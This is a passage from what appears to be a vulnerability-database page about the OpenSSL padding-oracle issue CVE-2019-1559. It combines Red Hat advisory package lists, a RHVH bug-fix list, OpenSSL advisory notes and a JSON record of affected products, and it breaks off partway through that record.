x86_64: openssl-1.0.2k-19.el7.x86_64.rpm openssl-debuginfo-1.0.2k-19.el7.i686.rpm openssl-debuginfo-1.0.2k-19.el7.x86_64.rpm openssl-devel-1.0.2k-19.el7.i686.rpm openssl-devel-1.0.2k-19.el7.x86_64.rpm openssl-libs-1.0.2k-19.el7.i686.rpm openssl-libs-1.0.2k-19.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.2k-19.el7.ppc.rpm openssl-debuginfo-1.0.2k-19.el7.ppc64.rpm openssl-perl-1.0.2k-19.el7.ppc64.rpm openssl-static-1.0.2k-19.el7.ppc.rpm openssl-static-1.0.2k-19.el7.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.2k-19.el7.ppc64le.rpm openssl-perl-1.0.2k-19.el7.ppc64le.rpm openssl-static-1.0.2k-19.el7.ppc64le.rpm
s390x: openssl-debuginfo-1.0.2k-19.el7.s390.rpm openssl-debuginfo-1.0.2k-19.el7.s390x.rpm openssl-perl-1.0.2k-19.el7.s390x.rpm openssl-static-1.0.2k-19.el7.s390.rpm openssl-static-1.0.2k-19.el7.s390x.rpm
x86_64: openssl-debuginfo-1.0.2k-19.el7.i686.rpm openssl-debuginfo-1.0.2k-19.el7.x86_64.rpm openssl-perl-1.0.2k-19.el7.x86_64.rpm openssl-static-1.0.2k-19.el7.i686.rpm openssl-static-1.0.2k-19.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.2k-19.el7.src.rpm
x86_64: openssl-1.0.2k-19.el7.x86_64.rpm openssl-debuginfo-1.0.2k-19.el7.i686.rpm openssl-debuginfo-1.0.2k-19.el7.x86_64.rpm openssl-devel-1.0.2k-19.el7.i686.rpm openssl-devel-1.0.2k-19.el7.x86_64.rpm openssl-libs-1.0.2k-19.el7.i686.rpm openssl-libs-1.0.2k-19.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.2k-19.el7.i686.rpm openssl-debuginfo-1.0.2k-19.el7.x86_64.rpm openssl-perl-1.0.2k-19.el7.x86_64.rpm openssl-static-1.0.2k-19.el7.i686.rpm openssl-static-1.0.2k-19.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2018-0734 https://access.redhat.com/security/cve/CVE-2019-1559 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.7_release_notes/index
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXUl3otzjgjWX9erEAQgZQQ//XNcjRJGLVmjAzbVGiwxEqfFUvDVNiu97 fW0vLXuV9TnQTveOVqOAWmmMv2iShkVIRPDvzlOfUsYrrDEYHKr0N38R/fhDEZsM WQrJh54WK9IjEGNevLTCePKMhVuII1WnHrLDwZ6hxYGdcap/sJrf+N428b5LvHbM B39vWl3vqJYXoiI5dmIYL8ko2SfLms5Cg+dR0hLrNohf9gK2La+jhWb/j2xw6X6q /LXw5+hi/G+USbnNFfjt9G0fNjMMZRX2bukUvY6UWJRYTOXpIUOFqqp5w9zgM7tZ uX7TMTC9xe6te4mBCAFDdt+kYYLYSHfSkFlFq+S7V0MY8DmnIzqBJE4lJIDTVp9F JbrMIPs9G5jdnzPUKZw/gH9WLgka8Q8AYI+KA2xSxFX9VZ20Z+EDDC9/4uwj3i0A gLeIB68OwD70jn4sjuQqizr7TCviQhTUoKVd/mTBAxSEFZLcE8Sy/BEYxLPm81z0 veL16l6pmfg9uLac4V576ImfYNWlBEnJspA5E9K5CqQRPuZpCQFov7/D17Qm8v/x IcVKUaXiGquBwzHmIsD5lTCpl7CrGoU1PfNJ6Y/4xrVFOh1DLA4y6nnfysyO9eZx zBfuYS2VmfIq/tp1CjagI/DmJC4ezXeE4Phq9jm0EBASXtnLzVmc5j7kkqWjCcfm BtpJTAdr1kE=7kKR -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
The following packages have been upgraded to a later upstream version: imgbased (1.1.9), ovirt-node-ng (4.3.5), redhat-release-virtualization-host (4.3.5), redhat-virtualization-host (4.3.5). Bugs fixed (https://bugzilla.redhat.com/):
1640820 - CVE-2018-16838 sssd: improper implementation of GPOs due to too restrictive permissions
1658366 - CVE-2018-16881 rsyslog: imptcp: integer overflow when Octet-Counted TCP Framing is enabled
1683804 - CVE-2019-1559 openssl: 0-byte record padding oracle
1687920 - RHVH fails to reinstall if required size is exceeding the available disk space due to anaconda bug
1694065 - CVE-2019-0161 edk2: stack overflow in XHCI causing denial of service
1702223 - Rebase RHV-H on RHEL 7.7
1709829 - CVE-2019-10139 cockpit-ovirt: admin and appliance passwords saved in plain text variable file during HE deployment
1718388 - CVE-2019-10160 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc
1720156 - RHVH 4.3.4 version info is incorrect in plymouth and "/etc/os-release"
1720160 - RHVH 4.3.4: Incorrect info in /etc/system-release-cpe
1720310 - RHV-H post-installation scripts failing, due to existing tags
1720434 - RHVH 7.7 brand is wrong in Anaconda GUI.
1720435 - Failed to install RHVH 7.7
1720436 - RHVH 7.7 should based on RHEL 7.7 server but not workstation.
1724044 - Failed dependencies occur during install systemtap package.
1726534 - dhclient fails to load libdns-export.so.1102 after upgrade if the user installed library is not persisted on the new layer
1727007 - Update RHVH 7.7 branding with new Red Hat logo
1727859 - Failed to boot after upgrading a host with a custom kernel
1728998 - "nodectl info" displays error after RHVH installation
1729023 - The error message is inappropriate when run imgbase layout --init
on current layout
This issue was discovered by Juraj Somorovsky, Robert Merget and Nimrod Aviram, with additional investigation by Steven Collison and Andrew Hourselt. It was reported to OpenSSL on 10th December 2018.
Note: Advisory updated to make it clearer that AEAD ciphersuites are not impacted.
Note
OpenSSL 1.0.2 and 1.1.0 are currently only receiving security updates. Support for 1.0.2 will end on 31st December 2019. Support for 1.1.0 will end on 11th September 2019. Users of these versions should upgrade to OpenSSL 1.1.1.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20190226.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201902-0192", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "big-ip advanced firewall manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "13.0.0" }, { "model": "jd edwards enterpriseone tools", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "9.2" }, { "model": "big-ip fraud protection service", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "14.0.0" }, { "model": "santricity smi-s provider", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "big-ip webaccelerator", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "15.0.0" }, { "model": "big-ip edge gateway", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "14.1.2" }, { "model": "communications diameter signaling router", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.3" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "6.9.0" }, { "model": "web gateway", "scope": "gte", "trust": 1.0, "vendor": "mcafee", "version": "7.0.0" }, { "model": "big-ip access policy manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "13.0.0" }, { "model": "hyper converged infrastructure", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "big-ip fraud protection service", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "12.1.0" }, { "model": "big-ip global traffic manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "13.0.0" }, { "model": "big-ip domain name system", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "13.1.3" }, { "model": "big-ip edge gateway", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "13.0.0" }, { "model": "big-ip analytics", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "15.0.0" }, { "model": "big-ip link controller", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "13.0.0" }, { "model": "big-iq centralized management", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "7.1.0" }, { "model": "big-ip analytics", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "13.1.3" }, { "model": "services tools bundle", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "19.2" }, { "model": "a800", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "cloud backup", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.1.0.5.0" }, { "model": "pan-os", "scope": "gte", "trust": 1.0, "vendor": "paloaltonetworks", "version": "7.1.0" }, { "model": "storagegrid", "scope": "gte", "trust": 1.0, "vendor": "netapp", "version": "9.0.0" }, { "model": "a220", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "big-ip application acceleration manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "12.1.0" }, { "model": "pan-os", "scope": "lt", "trust": 1.0, "vendor": "paloaltonetworks", "version": "8.0.20" }, { "model": "communications diameter signaling router", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.1" }, { "model": "communications performance intelligence center", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "10.4.0.2" }, { "model": "big-ip application security manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "13.0.0" }, { "model": "communications diameter signaling router", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.4" }, { "model": "communications session router", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "7.4" }, { "model": "snapcenter", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.55" }, { "model": "jd edwards world security", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "a9.3" }, { "model": "jd edwards world security", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "a9.4" }, { "model": "traffix signaling delivery controller", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "5.0.0" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "30" }, { "model": "mysql enterprise monitor", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "4.0.8" }, { "model": "big-ip analytics", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "15.1.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "18.04" }, { "model": "big-ip edge gateway", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "12.1.5" }, { "model": "big-ip fraud protection service", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "15.0.0" }, { "model": "big-ip webaccelerator", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "12.1.5" }, { "model": "big-ip link controller", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "12.1.5" }, { "model": "virtualization", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "4.0" }, { "model": "big-ip policy enforcement manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "13.0.0" }, { "model": "big-ip fraud protection service", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "14.1.2" }, { "model": "big-ip advanced firewall manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "14.1.2" }, { "model": "big-ip application acceleration manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "13.1.3" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "6.0.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "endeca server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "7.7.0" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.3.3" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.56" }, { "model": "big-ip local traffic manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "13.0.0" }, { "model": "leap", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "15.1" }, { "model": "big-ip application acceleration manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "15.0.0" }, { "model": "communications diameter signaling router", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.0.0" }, { "model": "mysql", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "8.0.15" }, { "model": "big-ip access policy manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "14.0.0" }, { "model": "big-ip link controller", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "14.1.2" }, { "model": "big-ip webaccelerator", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "14.1.2" }, { "model": "c190", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "agent", "scope": "lte", "trust": 1.0, "vendor": "mcafee", "version": "5.6.4" }, { "model": "traffix signaling delivery controller", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "5.1.0" }, { "model": "mysql", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "5.6.43" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "8.9.0" }, { "model": "big-ip edge gateway", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "14.0.0" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "29" }, { "model": "communications session router", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.2" }, { "model": "big-ip link controller", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "14.0.0" }, { "model": "ontap select deploy administration utility", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "ontap select deploy", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "threat intelligence exchange server", "scope": "lt", "trust": 1.0, "vendor": "mcafee", "version": "3.0.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "big-ip application acceleration manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "15.1.0" }, { "model": "big-ip domain name system", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "14.0.0" }, { "model": "big-ip edge gateway", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "12.1.0" }, { "model": "big-ip analytics", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "13.0.0" }, { "model": "big-iq centralized management", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "7.0.0" }, { "model": "communications session border controller", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.3" }, { "model": "big-ip domain name system", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "12.1.0" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.57" }, { "model": "mysql", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "5.7.0" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "6.17.0" }, { "model": "big-ip application acceleration manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "14.1.2" }, { "model": "big-ip access policy manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "12.1.5" }, { "model": "communications unified session manager", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.2.5" }, { "model": "big-ip fraud protection service", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "12.1.5" }, { "model": "big-ip global traffic manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "12.1.5" }, { "model": "big-ip local traffic manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "12.1.5" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "9.0" }, { "model": "big-ip advanced firewall manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "12.1.5" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "communications session router", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.0" }, { "model": "nessus", "scope": "lte", "trust": 1.0, "vendor": "tenable", "version": "8.2.3" }, { "model": "jboss enterprise web server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "5.0.0" }, { "model": "traffix signaling delivery controller", "scope": "eq", "trust": 1.0, "vendor": "f5", "version": "4.4.0" }, { "model": "big-ip policy enforcement manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "14.0.0" }, { "model": "big-ip access policy manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "14.1.2" }, { "model": "big-ip application security manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "12.1.5" }, { "model": "big-ip global traffic manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "14.1.2" }, { "model": "big-ip local traffic manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "14.1.2" }, { "model": "pan-os", "scope": "lt", "trust": 1.0, "vendor": "paloaltonetworks", "version": "8.1.8" }, { "model": "big-ip edge gateway", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "15.0.0" }, { "model": "big-ip local traffic manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "14.0.0" }, { "model": "big-ip edge gateway", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "13.1.3" }, { "model": "big-ip advanced firewall manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "14.0.0" }, { "model": "big-ip webaccelerator", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "13.1.3" }, { "model": "big-ip link controller", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "13.1.3" }, { "model": "pan-os", "scope": "gte", "trust": 1.0, "vendor": "paloaltonetworks", "version": "8.0.0" }, { "model": "pan-os", "scope": "gte", "trust": 1.0, "vendor": "paloaltonetworks", "version": "9.0.0" }, { "model": "big-ip domain name system", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "15.0.0" }, { "model": "leap", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "42.3" }, { "model": "virtualization host", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "4.0" }, { "model": "big-ip domain name system", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "14.1.2" }, { "model": "altavault", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "big-ip advanced firewall manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "12.1.0" }, { "model": "big-ip application acceleration manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "13.0.0" }, { "model": "big-ip global traffic manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "14.0.0" }, { "model": "big-ip application security manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "14.1.2" }, { "model": "big-ip webaccelerator", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "13.0.0" }, { "model": "big-ip policy enforcement manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "12.1.5" }, { "model": "big-ip analytics", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "14.1.2" }, { "model": "business intelligence", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "11.1.1.9.0" }, { "model": "big-ip access policy manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "12.1.0" }, { "model": "communications session router", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.3" }, { "model": "big-ip global traffic manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "12.1.0" }, { "model": "jd edwards world security", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "a9.3.1" }, { "model": "mysql enterprise monitor", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "8.0.14" }, { "model": "mysql", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "8.0.0" }, { "model": "element software", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "pan-os", "scope": "lt", "trust": 1.0, "vendor": "paloaltonetworks", "version": "9.0.2" }, { "model": "communications session border controller", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.0.0" }, { "model": "big-ip link controller", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "12.1.0" }, { "model": "business intelligence", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.2.1.3.0" }, { "model": "communications unified session manager", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "7.3.5" }, { "model": "big-ip edge gateway", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "15.1.0" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "big-ip link controller", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "15.1.0" }, { "model": "big-ip webaccelerator", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "15.1.0" }, { "model": "big-ip application security manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "14.0.0" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "13.2.0.0.0" }, { "model": "big-ip policy enforcement manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "14.1.2" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "16.04" }, { "model": "snapdrive", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "storage automation store", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "big-ip application security manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "12.1.0" }, { "model": "communications session router", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.1" }, { "model": "smi-s provider", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "pan-os", "scope": "gte", "trust": 1.0, "vendor": "paloaltonetworks", "version": "8.1.0" }, { "model": "threat intelligence exchange server", "scope": "gte", "trust": 1.0, "vendor": "mcafee", "version": "2.0.0" }, { "model": "oncommand unified manager", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "big-iq centralized management", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "6.0.0" }, { "model": "snapprotect", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "big-ip access policy manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "13.1.3" }, { "model": "big-ip advanced firewall manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "15.0.0" }, { "model": "big-ip fraud protection service", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "13.1.3" }, { "model": "storagegrid", "scope": "lte", "trust": 1.0, "vendor": "netapp", "version": "9.0.4" }, { "model": "big-ip global traffic manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "13.1.3" }, { "model": "big-ip local traffic manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "13.1.3" }, { "model": "fas2750", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "big-ip advanced firewall manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "13.1.3" }, { "model": "api gateway", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "11.1.2.4.0" }, { "model": "secure global desktop", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "5.4" }, { "model": "big-ip domain name system", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "12.1.5" }, { "model": "node.js", "scope": "lte", "trust": 1.0, "vendor": "nodejs", "version": "6.8.1" }, { "model": "fas2720", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "big-ip access policy manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "15.0.0" }, { "model": "web gateway", "scope": "lt", "trust": 1.0, "vendor": "mcafee", "version": "9.0.0" }, { "model": "big-iq centralized management", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "6.1.0" }, { "model": "big-ip analytics", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "12.1.5" }, { "model": "active iq unified manager", "scope": "gte", "trust": 1.0, "vendor": "netapp", "version": "9.5" }, { "model": "big-ip fraud protection service", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "13.0.0" }, { "model": "big-ip global traffic manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "15.0.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "big-ip policy enforcement manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "12.1.0" }, { "model": "communications diameter signaling router", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.2" }, { "model": "communications session border controller", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.1.0" }, { "model": "steelstore cloud integrated storage", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "big-ip link controller", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "15.0.0" }, { "model": "hci compute node", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "business intelligence", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.2.1.4.0" }, { "model": "storagegrid", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "solidfire", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "big-ip application security manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "13.1.3" }, { "model": "mysql workbench", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "8.0.16" }, { "model": "data exchange layer", "scope": "gte", "trust": 1.0, "vendor": "mcafee", "version": "4.0.0" }, { "model": "big-ip application acceleration manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "14.0.0" }, { "model": "big-ip local traffic manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "12.1.0" }, { "model": "big-ip webaccelerator", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "14.0.0" }, { "model": "big-ip access policy manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "15.1.0" }, { "model": "big-ip domain name system", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "13.0.0" }, { "model": "big-ip fraud protection service", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "15.1.0" }, { "model": "big-ip global traffic manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "15.1.0" }, { "model": "big-ip local traffic manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "15.1.0" }, { "model": "hci management node", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "big-ip advanced firewall manager", "scope": "lte", "trust": 1.0, "vendor": "f5", "version": "15.1.0" }, { "model": "big-ip application security manager", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "15.0.0" }, { "model": "communications session border controller", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.2" }, { "model": "mysql", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "5.6.0" }, { "model": "mysql enterprise monitor", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "8.0.0" }, { "model": "big-ip webaccelerator", "scope": "gte", "trust": 1.0, "vendor": "f5", "version": "12.1.0" }, { "model": "cn1610", "scope": 